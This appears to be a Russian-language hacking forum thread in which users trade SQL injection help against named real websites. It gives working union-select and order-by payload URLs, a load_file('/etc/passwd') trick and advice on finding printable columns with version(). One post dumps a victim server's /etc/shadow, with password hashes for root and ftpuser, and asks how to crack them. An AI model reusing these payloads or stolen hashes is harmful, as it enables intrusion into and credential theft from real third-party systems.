1. http://hack-shop.org.ru/tools-code-encode >SQL Hex + 0x | Path : 2. правильно load_file('/etc/passwd')
чот не могу подобрать кол-во столбцов уже дошел до 30 а при order by все время ошибка Ошибка запроса:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*' at line 1 объясните что делаю не так??? http://www.kn.kz/articles.php?id=-274+union+select+order+by+1/*
ну подскажите( c order by разобрался он мне говорит что там 3 столбца но при union select 1,2,3/* выдает ошибку Ошибка запроса:The used SELECT statements have a different number of columns http://www.kn.kz/articles.php?id=-1+union+select+1,2,3/*
В этой может подзапросы прокатят. Попробуй другие бажные скрипты поискать. На крайний случай, в сканер загани. Вот посмотри, может выйдет что. HTML: http://www.kn.kz/not_live_build.php?action=search&cityId=-2+union+select+0/*
у мя тут еще вопросик нашел инклуд удалось прочитать etc/shadow root:$1$8rIgCgQb$aAplIifRAaGkohCa4G1/8/:13773:0:99999:7::: bin:*:13742:0:99999:7::: daemon:*:13742:0:99999:7::: adm:*:13742:0:99999:7::: lp:*:13742:0:99999:7::: sync:*:13742:0:99999:7::: shutdown:*:13742:0:99999:7::: halt:*:13742:0:99999:7::: mail:*:13742:0:99999:7::: news:*:13742:0:99999:7::: uucp:*:13742:0:99999:7::: operator:*:13742:0:99999:7::: games:*:13742:0:99999:7::: gopher:*:13742:0:99999:7::: ftp:*:13742:0:99999:7::: nobody:*:13742:0:99999:7::: dbus:!!:13742:0:99999:7::: vcsa:!!:13742:0:99999:7::: rpm:!!:13742:0:99999:7::: haldaemon:!!:13742:0:99999:7::: netdump:!!:13742:0:99999:7::: nscd:!!:13742:0:99999:7::: sshd:!!:13742:0:99999:7::: rpc:!!:13742:0:99999:7::: rpcuser:!!:13742:0:99999:7::: nfsnobody:!!:13742:0:99999:7::: mailnull:!!:13742:0:99999:7::: smmsp:!!:13742:0:99999:7::: pcap:!!:13742:0:99999:7::: apache:!!:13742:0:99999:7::: webalizer:!!:13742:0:99999:7::: xfs:!!:13742:0:99999:7::: ntp:!!:13742:0:99999:7::: pegasus:!!:13742:0:99999:7::: named:!!:13742:0:99999:7::: ftpuser:$1$PF7fe8Eh$rITd0IUQ1KF809DLIfH6H/:13742:0:99999:7::: xat:!!:13745:0:99999:7::: mysql:!!:13754:::::: посоветуйте прогу для расшифровки как я понимаю тут md5 потому что стоит префикс $1$?
Vid0k Данные выводятся в Назв. Комплекса\ Database Version: 4.1.20 Database name: knkz User name: [email protected]
появился вопрос... вот есть инжект... Code: http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля?
не понял... всмысле перебрать? а тулзы юзать пока не получится.. линуху поставил, а линуховские тулзы не видел... просто такой движок я уже нашел примерно на 20 сайтах... именно тф же переменная уязвима и именно так же перебрасывает..
как я понял тебе нужно найти поле куда вписать значение? ну вот вписуй например version() в каждое поле с 1 по 19 пока чтото не выдаст...?
я канешн с такой траблой не сталкивался.. но почему нет? теоритически должно выйти.. токо с конвертированиям заипешся... unhex(hex(version())), больше идей нету..)
